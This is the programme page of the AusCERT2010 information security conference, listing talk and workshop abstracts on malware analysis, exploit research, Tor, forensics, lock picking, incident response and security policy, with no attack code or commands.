Home
About AusCERT
About the Conference
Program
Conference Location
About the Gold Coast
Travel Information
Visa Information
Call For Papers
Registration Fees
Delegate Registration
Sponsors
Exhibitor Staff Registration
Sponsorship Information
FAQ 
AusCERT
University of Queensland AusCERT2009 AusCERT2008
AusCERT2007
AusCERT2006
AusCERT2005
AusCERT2004
AusCERT2003
AusCERT2002Presentations:
| Farewell speech | |
| AusCERT | |
|
A short farewell to delegates, and wrap-up of the program. |
|
| Welcome speech | |
| AusCERT | |
|
A short welcome to the conference, and overview of the program. |
|
| Applied Security Visualization | |
| Raffael Marty - Loggly | |
|
Over the past years, security organizations have collected more and more data and log files within their networks and systems. Oftentimes, the data ends up being stored and archived without ever being used. This can be attributed to a lack of tools that help process and analyze all the data, but also to the lack of knowledge around data analysis. |
|
| Cryptography is hard | |
| Daniel Grzelak & Paul Theraault - stratsec | |
|
Even the most experienced mathematicians, cryptographers, and developers get it wrong. So what hope does the average web developer have? This half day workshop will provide practical no-nonsense advice for the web developer, no equations, no proofs, no fluffing about, just practical advice on how to solve real world problems with cryptography. |
|
| Capture the Flag | |
| Tim Rosenberg - White Wolf Security | |
|
Welcome to White Wolf Security's Capture the Flag (CTF) event. Players register as individuals. (You may decide to form attack teams of up to 4 players on the day). A list of targets (IP addresses) and flags/goals will be provided. Teams and individuals will be scored on their ability to compromise systems, edit and/or capture flags, and complete specific tasks (injects) within a certain amount of time. These injects could range from the technical to the policy; from offense to defense. Requirements: Players must bring their own laptop or hardware to attack from. NOTE: Do not bring a regular production laptop for this! You will be connecting to a live, hostile network. Players should assume that all data could be lost. Player assume all responsibility and risk by agreeing to play. |
|
| Professional Vulnerability Research and Analysis | |
| Chris Spencer - iDefense | |
|
This presentation will take an inside look at how day to day vulnerability analysis and research is conducted within a typical Vulnerability Research Team. Some topics that will be covered include: - Techniques and tools used to analyse Microsoft binary patches. - Static and dynamic binary analysis and vulnerability code path identification. - Proof-of-concept exploit development. - Tools and techniques used for debugging vulnerability related crashes. - Vulnerability discovery via binary analysis and source code analysis A Whirlwind tour of the techniques that we use in our daily work will be presented in the form of demonstration. The demonstration will cover the steps involved in taking a Microsoft patch and turning it into a working remote kernel exploit. This presentation may be of interest to anyone currently working in the vulnerability research field, or those who are planning to follow a career in this field. |
|
| Tor and censorship: lessons learned | |
| Roger Dingledine - The Tor Project | |
|
Tor is a free-software anonymizing network that helps people around the world use the Internet in safety. Tor's 1600 volunteer relays carry traffic for several hundred thousand users including ordinary citizens who want protection from identity theft and prying corporations, corporations who want to look at a competitor's website in private, and soldiers and aid workers in the Middle East who need to contact their home servers without fear of physical harm. Tor was originally designed as a civil liberties tool for people in the West. But if governments can block connections *to* the Tor network, who cares that it provides great anonymity? A few years ago we started adapting Tor to be more robust in countries like China. We streamlined its network communications to look more like ordinary SSL, and we introduced 'bridge relays' that are harder for an attacker to find and block than Tor's public relays. In the aftermath of the Iranian elections in June, and then the late September blockings in China, we've learned a lot about how circumvention tools work in reality for activists in tough situations. I'll give an overview of the Tor architecture, and summarize the variety of people who use it and what security it provides. Then we'll focus on the use of tools like Tor in countries like Iran and China: why anonymity is important for circumvention, why transparency in design and operation is critical for trust, the role of popular media in helping -- and harming -- the effectiveness of the tools, and tradeoffs between usability and security. After describing Tor's strategy for secure circumvention (what we *thought* would work), I'll talk about how the arms race actually seems to be going in practice. |
|
| BlackEnergy 2 Revealed | |
| Joe Stewart - SecureWorks | |
|
BlackEnergy is a popular DDoS trojan written by "Cr4sh", a member of the Russian hacking group "Hell Knights". Recently a major new version of the trojan in extremely limited circulation was identified in the wild by the presenter of this talk. This new rewrite of the trojan expands BlackEnergy's capabilities from a simple DDoS trojan to a stealthy modular platform for DDoS, spam and banking fraud. This talk is an in-depth look at the low-level functionality of the BlackEnergy 2 trojan. After listening to this talk, attendees should be able to: |
|
| The Torpig Trojan: Lessons Learned From Five Years In The Trenches | |
| Jason Milletary - SecureWorks | |
|
2010 will mark the 5th year of operation of a mysterious group of criminals overseeing a vast international network of online identity theft crime. The primary tool they use is a piece of malware commonly referred to as Torpig, Sinowal, Anserin, or Mebroot. In this group, we have seen cutting-edge technical advances in malware and unending savvy in the ability to hide their identities. In this presentation, we will explore the timeline the timeline of this group from the perspective of a single humble analyst. It is the hope that by understanding the actions of this group, we can identify lessons learned from a technical and legal standpoint and utilize them moving forward. Does this story have a happy ending? We will have to wait and see. This presentation is intended for all people interested in learning more about cybercrime and lessons on how we can improve the fight from the point of view of the speaker. In this presentation we will cover: |
|
| Pulling the Plug: Security Risks in the Next Generation of Offline Web Applications | |
| Michael Sutton - ZSCALER | |
|
As the line between desktop and web applications becomes increasingly blurry in a web 2.0 world, browser functionality is being pushed well beyond what it was originally intended for. Persistent client side storage has become a requirement for web applications if they are to be available both online and off. This need is being filled by a variety of technologies such as Gears (formerly Google Gears) and the Database Storage functionality included in the emerging HTML 5 specification. While all such technologies offer great promise, it is clear that the vast majority of developers simply do not understand their security implications. Researching a variety of currently deployed implementations of these technologies has revealed a broad scope of vulnerabilities with frightening implications. Now attackers can target victims not just once, but every time they visit a site as the victim now carries and stores the attack with them. Imagine a scenario whereby updated confidential information is forwarded to an attacker every time a victim interacts with a given we application. The attacker no longer needs to worry about timing their attacks to ensure that the victim is authenticated as the victim attacks himself! Limited storage? Cookies that expire? Not a problem when entire databases are accessible with virtually unlimited storage and an infinite lifespan. Think these attacks are theoretical? Think again. In this talk we dive into these technologies and break down the risk posed by them when not properly understood. We will then detail a variety of real-world vulnerabilities that have been uncovered, including a new class of cross-site scripting and client-side SQL injection. |
|
| Suricata and the Open Information Security Foundation(OISF) | |
| Matt Jonkman - The Open Information Security Foundation | |
|
The Suricata Engine is an Open Source Next Generation Intrusion Detection and Prevention Engine. This engine is not intended to just replace or emulate the existing tools in the industry, but will bring new ideas and technologies to the field. The Open Information Security Foundation (OISF) is a non-profit foundation organized to build a next generation IDS/IPS engine. The OISF has formed a multi-national group of the leading software developers in the security industry. In addition to developers and a consortium consisting of leading cyber security companies, OISF has engaged the open source security community to identify current and future IDS/IPS needs and desires OISF’s primary goal is to remain on the leading edge of open source IDS/IPS development, community needs and objectives. This is only attainable if you, the community, get involved. We welcome participation large and small and have built working groups and mailing lists to engage and educate all interested people and organizations. Funding for the OISF comes from the US Department of Homeland Security (DHS) and a number of private companies that form the OISF Consortium. These companies gain a non-gpl limited license for the engine in return for their ongoing support. Over time, OISF will take on new projects and challenges. |
|
| The Role and Function of Social Networks in the Russian Malware Community | |
| Max Kilger - The HoneyNet Project | |
|
A great deal of research has focused on the malicious software and attack tools generated by Russian hacker groups to engage in attacks against economic systems, government, and civilian targets. Technical explorations of malware provide insight into defensive postures to reduce these threats, though there is still a great deal that is unknown about the social dynamics of hacking in this part of the world. This presentation will attempt to expand our understanding of the peer networks, demographic composition, and skills of the members of eight groups from the Eastern European and Russian hacker community using open source data. The findings give significant insight into the education, physical locations, and social relationships between hackers and malware writers. The social networks that undergird this community will also be explored in depth, including the proximity and distribution of skilled and unskilled hackers. This presentation will benefit law enforcement, security professionals, and the intelligence community by shedding light on the social world of the Russian hacker community. |
|
| Training Your Pigs to Dance on a Shoestring - How to Run a Security Awareness Programme | |
| Richard Beach - InLand Revenue - NZ Government | |
|
The presentation is split into three parts: Intended Audience: Assumptions: |
|
| Lock Picking - class instance 1 | |
| Deviant Ollam - deviating.net | |
|
Physical security is an oft-overlooked component of data and system security in the technology world. While frequently forgotten, it is no less critical than timely patches, appropriate password policies, and proper user permissions. You can have the most hardened servers and network but that doesn't make the slightest difference if someone can gain direct access to a keyboard or, worse yet, march your hardware right out the door. Those who attend this session will leave with a full awareness of how to best protect buildings and grounds from unauthorized access. Attendees will not only learn how to distinguish good locks and access control from poor ones, but will also become well-versed in picking and bypassing many of the most popular locks used in the business world today... convince management that a new investment is necessary by showing them yourself how the server room door can be opened without a key in under a minute! |
|
| Lock Picking - class instance 2 | |
| Deviant Ollam - deviating.net | |
|
Repeat of this morning's class. Physical security is an oft-overlooked component of data and system security in the technology world. While frequently forgotten, it is no less critical than timely patches, appropriate password policies, and proper user permissions. You can have the most hardened servers and network but that doesn't make the slightest difference if someone can gain direct access to a keyboard or, worse yet, march your hardware right out the door. Those who attend this session will leave with a full awareness of how to best protect buildings and grounds from unauthorized access. Attendees will not only learn how to distinguish good locks and access control from poor ones, but will also become well-versed in picking and bypassing many of the most popular locks used in the business world today... convince management that a new investment is necessary by showing them yourself how the server room door can be opened without a key in under a minute! |
|
| An Historical Look at Cloud Computing | |
| Whitfield Diffie | |
|
The history of information security is one of repeated confrontations resources too valuable to be ignored which bypass our conventional from radio through shared computing and networking to cloud computing and speculate on what form the solution of this latest challenge will take. |
|
| Scenes from the 2010 US/China cyberwar | |
| Marcus J. Ranum - Tenable Network Security, Inc. | |
|
After watching the great US/China cyberwar of 2010, I was left puzzled, confused, and probably - as a taxpayer - quite a bit poorer. I'd like to take the opportunity to share my confusion with you. |
|
| Presentation to be announced | |
| No abstract provided for this presentation yet. Please check again later. | |
| Using Vulnerability Management to Thwart Data Loss | |
| Bob Maley : Strategic CISO | |
|
Four years ago, the state of Pennsylvania had almost no capability for finding or reporting security vulnerabilities in its software applications, including the many public-facing Web sites through which the state gathers and distributes information to its constituents. However, after several noteworthy attacks and data breaches in its IT systems, including SQL injection campaigns emanating out of China, the state was forced to report a total of 500,000 stolen citizen and employee records during 2007. As the number of these attacks increased, the state's Office of Administration, Office for Information Technology (OA/OIT) realized that there was a need to change its overall security strategy from a network centric based model to a holistic model which included application security. This process was dubbed the Commonwealth Application Certification and Accreditation (CA)2 Process. Today, enforced as a certified mandate affecting all state agencies in Pennsylvania, the (CA)2 set of policies requires all affected organizations to complete a risk assessment process which includes questionnaires, source code scans, host based intrusion scans, and vulnerability assessments before applications are allowed to move into production. These questionnaires, scans, and assessments not only force an established level of application security to be embraced by individual agencies, but also help to benchmark the risk that applications pose to the state's broader IT infrastructure. To date the (CA)2 process has identified critical vulnerabilities that if not corrected could have been exploited by SQL or XSS attacks which could have led to identity thefts and the propagation of malicious code. By closing vulnerabilities before they were exploited, the Commonwealth has prevented data leakage, identity theft and theft of services, and saved millions of dollars that would have been spent on related response efforts. To note, Pennsylvania dropped its total volume of exposed records to just over 200 records during 2008 In 2009, the state had only had a handful of sensitive records compromised, as a direct result of the program. In this talk, former Pennsylvania CISO Bob Maley, the originator and architect of the (CA)2 process, will touch upon everything from the problems that the requirements seek to address to the unique challenge of creating a new security standard, evolving it over time and evangelizing the process to affected constituents. |
|
| Security FAIL: We're doing it wrong. | |
| Scott McIntyre - XS4ALL | |
|
Working as the Chief Security Officer at an ISP and member of a national telco's CERT for the better part of a decade, as well as serving on the Board of Directors for the globally focussed Forum of Incident Response and Security Teams brings with it many adventures, challenges, laughs, tears, and hair loss to someone who can't afford it. Reflections on how we as a IT security community are handling recent threats, the role of ’disclosure’ , governance, FUD and the ever present (and increasing) threat of government over-regulation stifling innovation are just some of the topics which will be covered during this likely controversial talk. We all suffer the fallout from IT security failures, including those caused by CSIRT teams and incident handlers. Understanding the far-reaching consequences to our actions is critical if we're ever going to have a safer Internet experience for the masses. |
|
| Presentation to be announced | |
| John Stewart - Vice President and Chief Security Officer - Cisco | |
| Speed-debating: Topics in information security | |
| Chair: Adam Spencer; Panel: Max Kilger, Scott McIntyre, Marcus J. Ranum, Roger Dingledine, Alastair MacGibbon, Paul Gampe, Tim Redhead & Frank Stajano | |
|
First introduced at AusCERT2008, this session comprises a series of fast-paced mini-debates where mixed teams of 3 panellists per team, debate several different topics over the course of the session. The debates are very-short (around 1 minute speaking slot per team member) and the audience votes on the outcome of each debate before we quickly move onto the next topic. For each debate topic, the composition of the teams change... so former team members may appear on different teams for each topic! |
|
| DDoS Self Defence | |
| Joe Stewart - SecureWorks | |
|
DDoS attacks allow someone to leverage a large number of computers against a target whose typical means of response is to shut down the affected services/systems or spend inordinate amounts of money and time working with ISPs and/or anti-DDoS vendors to quell the attack. Sometimes however, it is possible to diminish the effects on the target by leveraging properties of the protocols used in the attack to the advantage of the victim. This talk will detail one such method which is effective against many HTTP-based DDoS attacks, along with a guide to DDoS tools, DDoS bots and controllers, and how to identify and track them. This talk is designed to convey specific information about DDoS tools and how to combat certain types of DDoS attacks. |
|
| Stranger in a Strange Land: Reflections of a Linux Guy in Microsoft Windows | |
| Crispin Cowan - Microsoft | |
|
Dr. Crispin Cowan, famous Linux security guy and vocal Microsoft critic, now works at Microsoft. What? Has Hell opened a ski resort? This talk will reflect on my experience at Microsoft as a Linux guy. Hell has not frozen over, and I'm having a great time. I will talk about how the Linux and Windows communities are more similar to each other than either community cares to admit, for good and bad, as well as highlighting the differences that I have found. I will also highlight the similarities and differences in the security problems faced by Windows and Linux, and how they deal with them. |
|
| Mobile Security | |
| Ben Bromhead & Ken Hendrie - stratsec | |
|
With the widespread expansion of mobile phone functionality and the increasing demand to incorporate mobile devices as part of an executive’s business toolkit, there is, like never before, an overwhelming need to address security; as the proliferation of these devices and their applications continue to go through the roof. The presentation will outline the threats and risk associated with mobile device deployment in an enterprise environment, as well as the controls used to counter these risks. Through the use of case studies and practical demonstrations, we will show that these risks are real and easily accessible. On top of this we will showcase innovative solutions that are evolving to meet these risks. The audience will only require a basic knowledge of security concepts and the presentation is designed to be easily followed by all. |
|
| Telco Security - from the inside | |
| Mike Seddon - Telecom New Zealand | |
|
We are now surrounded by multiple security frameworks, compliance obligations, regulatory requirements, and a growing number of security vendors pitching their increasingly complex solutions. Each and every one of these is presented as the answer, sometimes the answer to all our problems. Unfortunately, all too often we get blinded by the hype and seem to be forgetting about our people. They are the ones who will make sense of all the flashing lights and sirens from those expensive ‘silver bullet’ tools you spend your security budget on. They are the ones who will develop the new processes and procedures needed to meet all your compliance obligations. They are the ones who will step in to save the day when the walls appear to be tumbling down around you. I’ll be talking about our people along with some of the security related projects they’ve been working on. I’ll also give you an inside view of some expected and unexpected benefits of giving the security folks time to develop their own tools and processes. After all, they know what’s needed. |
|
| A Framework to understand and handle Internet Abuse Incidents | |
| Juhani Eronen - CERT Finland | |
|
Today Internet Abuse comes in many forms, e.g. spam, malware infections, identity theft, targeted attacks, distributed denial of service (DDoS) attacks and other cybercrime activities. Sources and forms of the badness vary but from the perspective of cyber citizens and organizations one question needs timely answers. Are my systems victims or sources of these attacks? Principal activity (past tense/present perfect tense) We have have been experimenting with a framework aimed to answer if your IP-addresses, netblocks or address spaces are part of it. Methodology (past tense) In this framework we have documented the available feeds of information, use cases, processes, workflows, architectures, terminology, and the context of abuse fighting. We have attempted to provide some process building blocks and supporting software, such as the AbuseHelper toolkit to automatize part of the work, which is a modular, scalable and robust software to help you in your Internet abuse handling process. This documentation and development has been done in open source fashion. Results (past tense) The framework captures several generations of approaches to handling abuse by CSIRT teams, namely CERT-FI and CERT-EE, for their constituencies. Conclusions (present tense/tentative verbs/modal auxiliaries) In this presentation we reach out to you and by explaining what has been done we probe you for feedback what would be useful from your perspective. We feel that abuse reports are a valuable information feed about the actualised risks regarding network hosts and services. The integration of abuse data with network monitoring and audit findings could serve to provide much-needed information for the management of infrastructure risks. We are interested in your views about expanding the use cases beyond classic CSIRT activity towards governmental and commercial organizations participating more directly in the abuse handling process itself. |
|
| Connecting PM to routers | |
| Hillar Aarelaid - CERT Estonia | |
|
This presentation demonstrates a novel approach to managing a state CIIP infrastructure. Development of a specialized information system (IS) is underway which is capable of interfacing itself with existing public and private systems to obtain status information for various strategic services. Another layer of the system will present interdependencies between strategic partners and will create an awareness-view for national leaders. Last, but not least, the system will create a semi-automatic basis to produce reports to national leaders. Efforts are being made to create communications and to represent metrics in a way which will not reveal business-secrets between competitive players. The whole approach is heavily dependant on, and legally assured by, the Estonian (very modern) Emergency Situation Act; approved in June 2009 (English translation is available on request). Deployment of the system will include IS-assisted preparedness trainings. Audiences from fields such as: national security, CIIP, SCADA; will learn how to build a real-time nationwide situational awareness system. |
|
| Amazon EC2 security | |
| Simone Brunozzi - Amazon.com | |
|
Simone Brunozzi, Amazon Web Services (AWS) Technology Evangelist for APAC, will briefly introduce the Amazon Web Services platform, and then dig into security details for Amazon EC2, covering the aspects that can be publicly discussed: physical, network security; instance isolation at the hypervisor lever; common network attacks and how the EC2 team prevents or blocks them; and so forth. The session will end with a brief Q&A. |
|
| Titan Rain, the inside story of Shawn Carpenter | |
| Richard Stiennon - IT Harvest | |
|
While most of the countries of the world seek peaceful co-existence some have engaged in economic battles that entail a state sponsorship of local industries at the expense of competitive forces. In 2004 and 2005 Shawn Carpenter, a security administrator at Sandia National Labs in New Mexico discovered activity he traced back to China that indicated cyber espionage activity that targeted US government, research, and military resources. Attendees will learn the methodologies the Chinese used to steal critical data on the Mars Lander and military data from US research labs. They will also learn the techniques the Shawn employed to back track the hackers and use their own tools against them. Shawn Carpenter was 34 when he began his investigation into suspicious activity on the network of Sandia Labs in Albuquerque, New Mexico. He had risen through the ranks from nuclear mechanical systems maintenance to IT Security administrator. When he became responsible for monitoring Sandias IDS systems he quickly became aware that all was not well. There were intrusions into Sandia’s networks as well other connected agencies and research labs. Shawn called on contacts within the US Military to guide him through his investigations after being told to drop his activity by his employer. From his home lab Shawn counter attacked the hackers that were abusing Sandias network. He managed to gain control of their servers and capture copies of exfiltrated data. This presentation describes in detail Shawns experience as he became a Confidential Informant of the FBI and was eventually dismissed from Sandia. A dismissal that led to a successful civil suit against Sandia. While press reports at the time of these events indicted the seriousness of the attacks against US research labs they did not delve in to the technical details. Those details came out in the law suit and are the primary source of material for this presentation. |
|
| A history of Microsoft exploit mitigations | |
| Benjamin Mosse - stratsec | |
|
The theory behind memory corruption vulnerabilities has been known and understood since the early seventies, however arguably the first article that clearly provided practical steps to exploit memory corruption was published by the Internet magazine Phrack in 1996. The now infamous article Smashing the Stack for Fun and Profit paved the way for mostly-underground researchers to make this class of vulnerability the most widespread and dangerous in the field of computer security. Prior to 2003 (with the release of Windows Server 2003 and then Windows XP service pack 2), no Microsoft based operating system implemented any kind of mitigation against memory corruption vulnerabilities. The proposed presentation will provide an overview of the history of exploitation protection Microsoft as it has developed since 2003. It will also discuss how the built-in protection has influenced the direction vulnerability researchers have followed as they were forced to find alternative methods of exploitation (for example the move towards client-side attacks). The speaker will also explain, in parallel, the techniques discovered by hackers and security researchers for bypassing security improvements Microsoft has implemented. The presentation will conclude with the speaker providing a summation of what future directions Microsoft platform may take based on current exploitation mitigation solutions, and the evolution of the Windows operating system with the newly released Windows 7. |
|
| The Rules of the Internet, and the Browsers That Break Them | |
| Daniel Grzelak & Paul Theraault - stratsec | |
|
The Web, as a software platform, is a complex mess of binary: operating systems, browsers, plug-ins and extensions wrapped up in a standard and neat little bow, to achieve a passable level of interoperability. In order to be secure all of these components must be enforcing the same security model and principles – but security controls vary between browsers, between plug-ins and even between different versions of software making security decisions extremely difficult. By comparing and cataloguing the different browser and plug-in behaviours this presentation aims to simplify the web for developers, sysadmins and everyday Internet users to allow people to make more informed decisions about web application security. |
|
| Digital Forensics Accreditation | |
| Aaron Wooten - StratSec | |
|
As the concept of computer forensics has started to evolve into mainstream security consulting, so to have the emergence of related standards and best practices guidelines. Each sets its own expectation as to how forensics should be performed, and the results that should be attained. However, in the end any Computer Forensics professional would say that what is important is that any computer forensics task is repeatable, reproducible and presentable in the Court of Law if required. So what computer forensics standards are available, what is relevant, and what provides us with the best assurance in the outcomes of a computer forensics investigation? This presentation provides the audience with an understanding of current and emerging computer forensics standards and best practices and also highlights the pros and cons of each. |
|
| AFP High Tech Crime year in review | |
| Alex Tilley and Col Dix - Australian Federal Police | |
|
The Australian Federal Police's High Tech Crime Operations and Investigations areas deal with an increasingly wide variety of cases and incidents each year. In this presentation two experienced ‘boots on the ground’ staff members will run you through a few of the more interesting cases and incidents with an eye to providing the audience with an insight into the types of work the AFP are tasked to undertake each day. |
|
| Setting the scene in vulnerability work | |
| Juhani Eronen - CERT Finland | |
|
Software faults and vulnerabilities are complex issues that involve actors with various goals as well as multitude of soft and hard dependencies. Vulnerabilities have come to involve most of the society with the advent of prevalent usage of information technology. Principal activity (past tense/present perfect tense) The purpose of this presentation is to present a brief summary of the current vulnerability landscape. Methodology (past tense) The presentation draws on the experiences of ten years of vulnerability discovery and coordination. Results (past tense) The most important aspect to realise about vulnerability work is that it is a problem of resource limitations. The researchers try to maximise their productivity in terms of vulnerability sophistication, volume and impact, all considered hard research problems. Coordinators and reporters try to relay this information to the vendor in a clear and concise manner, while avoiding false positives, hype and needless pressure. Developers and vendors have goals ranging from protecting their customers to making revenue. Conclusions (present tense/tentative verbs/modal auxiliaries) The industry is currently mostly failing to produce dependable, secure and safe code. The current state of the art in vulnerability work highlights the need for developing methods for coping with vulnerability. |
|
| Understanding scam victims: seven principles for systems security | |
| Frank Stajano - University of Cambridge, UK | |
|
The success of many attacks on computer systems can be traced back to the security engineers not understanding the psychology of the system users they meant to protect. We examine a variety of scams and short cons that were investigated, documented and recreated for the BBC TV programme The Real Hustle and we extract from them some general principles about the recurring behavioural patterns of victims that hustlers have learnt to exploit. We argue that an understanding of these inherent human factors vulnerabilities, and the necessity to take them into account during design rather than naïvely shifting the blame onto the gullible users, is a fundamental paradigm shift for the security engineer which, if adopted, will lead to stronger and more resilient systems security. |
|
| Integrating Information Security Policies within the Corporate Risk and Business Continuity Management Framework | |
| Maria Corpuz - Department of Education and Training (Queensland) | |
|
Organizations implement corporate risk and business continuity management practices in accordance with their corporate governance policy structure. To cope with the escalated statistics in information security incidents, information security management has become a major element of corporate governance. This presentation provides a simple 3-step approach composed of auditing, developing, and implementing security policies as control measures within the corporate risk and business continuity management framework. Practical case examples of the successful implementation of the 3-step approach in corporate incident management are also presented as take away lessons that can easily be adopted for any type of organisation. The presentation consists of three parts: Part 1- Introduction, Part 2- The 3-step Security Policy Framework, and Part 3- Case Examples. The Introduction first provides global statistics on the state of security policies development and implementation. This is followed by an overview on information security policies and their relevance in implementing corporate risk and business continuity management. Part 2 presents the 3-step approach that consists of the audit phase, the development phase, and the implementation phase. The framework is presented as a cyclical process within the corporate risk and business continuity management framework. Part 3 presents 4 practical case examples of the successful implementation of the 3-step approach as take away lessons that can easily be adopted for any type of organisation. As a summary, a checklist consisting of the security policies that can easily be implemented is provided. |
|
| Cyber Intrusion: A Government Case Study | |
| Technical Investigations, Cyber Security Operations Centre - Defence Signals Directorate | |
|
How do you stop an attacker exploiting a vulnerability no-one knows about in a system you didn't know you had and stealing data you thought no one cared about? Drive-by-downloads and email-borne viruses are everyday hazards for every organisation with an internet connection, but what happens when a knowledgeable, determined attacker comes after not 'a network' but YOUR network? This presentation explores an intrusion on to the network of a contemporary organisation. We'll examine the techniques employed by the intruders, how this intrusion was detected and what would have stopped it happening in the first place. |
|
| US Secret Service: Cell Phone and Embedded Technology Forensics | |
| Andy Kearns : Special Agent - United States Secret Service | |
|
A look at the current and future capabilities of cell phone forensics as conducted by the United States Secret Service. Not only does the US Secret Service operate a state of the art forensic facility, it also trains students, through a partnership with Tulsa University, to be on the cutting edge of embedded technology forensics for government and intelligence service. From laboratory chip-off analysis to field extraction of embedded data, the US Secret Service is able to provide complete forensic analysis services to its own agents as well as state, local, and even global law enforcement partners. |
|
| Black Hat, White Hat, Gray Hat, RedHat: What Dr. Seuss Forgot to Tell You About the Computer Hacker Community 2.0 | |
| Max Kilger - The HoneyNet Project | |
|
At the very first AUSCERT conference in 2002 this original talk outlined some of the motivations of malicious actors and entities on the Internet. It's now been eight what seems like very long years later and there have been incredible shifts in the threat matrix. There have also been significant shifts in the motivational matrix as well. In this presentation we will look at some new data that compares motivational distributions then and now. In addition, we will utilize these motivational shifts to identify potential emerging future threats that are likely to appear on the event horizon soon. |
|
| Liability in Cyberspace - Time for a Re-think? | |
| Arun Raghu - stratsec | |
|
This presentation explores a fundamental question for which no definitive answer yet exists: who should be held liable for criminal or otherwise unlawful conduct in cyberspace? The presentation is targeted toward any professionals with an interest in the cross over between security and legal issues in cyberspace. Traditional approaches to apportioning liability in cyberspace are typically focussed on holding the perpetrators of wrongful conduct responsible. While this is at first glance quite logical, the inexorable growth of cybercrime and financial losses sustained online has highlighted somewhat of a failure in the effectiveness of current cybercrime laws. This means that alternate models for apportioning liability need to be evaluated. The presentation considers those alternatives, as well as additional issues their implementation might create. This is done in the context of examining several discrete areas which highlight the current ambiguity that exists with regards to liability in cyberspace. As cyberspace continues to become a crucial driver of the global economy, the need to more clearly define where responsibility for online misconduct should lie has increased dramatically. While this presentation does not intend to provide definitive answers in response to this need, it provides the intended audience with an indication of the key issues that have arisen in this area through references to salient cases and examples. In so doing, it is designed to encourage further thought and awareness of the importance of addressing the difficulties present in this area. |
|
| US Internal Revenue Service - Criminal Investigation of Electronic Crimes | |
| Jeffrey Willert and Raymond O. Aghaian - US Internal Revenue Service & United States Attorney's Office | |
|
This presentation will cover the 'program', its significant investigations, and forensic methodologies and will include some major recent case-law impacts. |
|
| Stay safe with your head in the clouds | |
| Paul Gampe : Vice President of Engineering Services and Operations at Red Hat | |
|
Don't let security concerns prevent you from adopting the latest innovation in IT infrastructure - Cloud Computing. Learn how the skills you have learned to secure applications are forming the foundation of 'sVirt'. Using libvirt in your linux installation allows you to control the isolation of virtual machines with the use of mandatory access control. This presentation will use specific operating systems such as 'SELinux' to illustrate the value of this approach. |
|
| Cyber Exercises: Training and Skills Identification | |
| Tim Rosenberg - White Wolf Security | |
|
As cyber exercises move into the mainstream; there are several considerations about their use to identify and validate people, processes and technology. This talk will focus on the various types of exercises and how they fit into an educational and professional framework. The talk will also compare and contrast several exercise models and the pros/cons of building your own. |
|
| A Perspective from the UK. The counter-fraud activities of 'Action Fraud' and 'National Lead Force' | |
| Peter Ratcliffe : Detective Chief Inspector - National Fraud Authority - UK | |
|
This presentation will highlight the significant developments that have taken place in the past 3 years in the UK regarding the countering of fraud. I will pay particular attention to Action Fraud (the national reporting centre for fraud), the National Fraud Intelligence Bureau (which collates and analyses fraud intelligence from a wide range of sources across the UK) and the National Lead Force (a police unit based in the City of London, which has a national role for investigating major fraud). These are major changes in the fight against fraud, brought about after a review of fraud and it's effects by the Attorney-General, and mark a change in how fraud is viewed by both government, law enforcement and the private sector within the UK. |
|
| Engagement between National / Government CERTs and the vendor community; benefits and challenges | |
| Karl Hanmore & Steve Adegbite - Microsoft | |
|
This presentation examines the complex interactions between the National/Government CERT communities and software vendors. This talk looks to examine some of the underpinning challenges in ensuring a mutually beneficial relationships between these disparate organization types, with a view to highlighting the potential benefits and mechanisms for a way forward. This presentation will use some examples relating to Microsoft’s engagement with this community, however will primarily look at the broad ecosystem issues rather than focusing on Microsoft as a case study. It is hoped that the audience will gain a perspective of the potential issues and benefits underpinning these relationships both from the perspective of the CERT as well as from the vendor perspective. The presentation aims to highlight these issues with a view to influence the broad security ecosystem and the state of interaction between National/Government CERTs and the broader vendor community. Additionally, a new program by Microsoft specifically targeting this community will be highlighted as an example of how vendors can work more closely with the Government CERT community to the benefit of the broader ecosystem. The presentation will be presented in two parts, with the initial material and generic ecosystem issues presented by Karl Hanmore, Senior Security Strategist MSRC & new program details being presented by Steve Adegbite, Senior Security Program Manager Lead. |
|
| The Four Types of Lock | |
| Deviant Ollam - deviating.net | |
|
Physical security is an oft-overlooked component of data and system security in the technology world. You can have the most hardened servers and network but that doesn't make the slightest difference if someone can gain direct access to a console keyboard or, worse yet, march your hardware right out the door. While numerous ratings and standards exist in order to classify specific security hardware, many of these standards are ill-defined and poorly-understood. Do you know what makes a ‘hardened’ or ‘contractor grade’ lock special? What does the phrase ‘high security’ signify on hardware packaging? As it turns out, many of these terms are just for show... but Deviant will walk you step-by-step through some distinct and easy-to-follow examples of how low-grade locks can fail as well as how to clearly identify quality equipment. Additionally, we will cover the more difficult matter of hardware purchase decisions at the highest levels... fine distinctions such as which locks belong on the CEO's office versus which ones to use on your server rooms. Every situation calls for something a bit different, and those differences add up when you're spending $100 or more per lock. Make your money count and keep your budget, and your data, secure. outline: Introduction One Step Up - Pick Resistant and Commercial Locks The Next Step - High Security Locks Discussion of Safes Destructive Entry vs. Non-Destructive The Four Types of Lock Basic A Word About Forensics (if there's time) Which Locks are Which Direct Examples of these higher grades of lock |
|
| Windows volatile memory forensics for incident response | |
| Michael Cohen & Bradley Schatz - Australian Federal Police and Schatz Forensic | |
|
This full day tutorial will teach forensic acquisition and analysis techniques with a focus on investigating and identifying potential malware or intrusions involving the Windows OS. The course is aimed at a technical audience, such as incident responders and forensic examiners, who are interested in learning the latest in volatile memory acquisition and analysis. Participants should be familiar with the Microsoft Windows platform, and have some familiarity with operating system principles. |
|
| Assessing and Exploiting Web Applications with Samurai-WTF | |
| Justin Searle - InGuardians | |
|
This course will focus on using open source tools to perform web application assessments. The course will take attendees through the process of application assessment using the open source tools included in the Samurai Web Testing Framework Live CD (Samurai-WTF). First we will take students through the steps and open source tools used to assess applications for vulnerabilities. Next we will focus on the exploitation of web app vulnerabilities, looking at server side attacks and then client side attacks. The latest tools and techniques will be used throughout the course, including several tools developed by the trainers themselves. |
|
| Enterprise Resilience through effective Business Continuity Management | |
| Guy Peterson & Alan Fraser & Mick Grover - BOARTES Consulting and Booz & Company | |
|
Participants will be provided with a solid overview of Enterprise Resilience and Business Continuity Management. Participants will be provided with an understanding of the history and evolution and practice of Business Continuity Management, and will stepped through the process of implementing a Business Continuity Management Program, and development of a supporting Business Continuity Plan (BCP) Framework. Key steps will include: |
|
| Incident Response tutorial | |
| Mark Goudie & Chris Novak - Verizon Business | |
|
Verizon Business routinely performs Incident Response training for our Rapid Response retainer clients, and we have trained in excess of 100 organisations in Incident Response around the globe. We are offering our experience and expertise in this field to AusCERT 2010 attendees. |
|
AusCERT2010 Executive Program | |
|
Whitfield Diffie Dr Nick Tate Professor Danny Smith Bob Maley - various organisations |
|
|
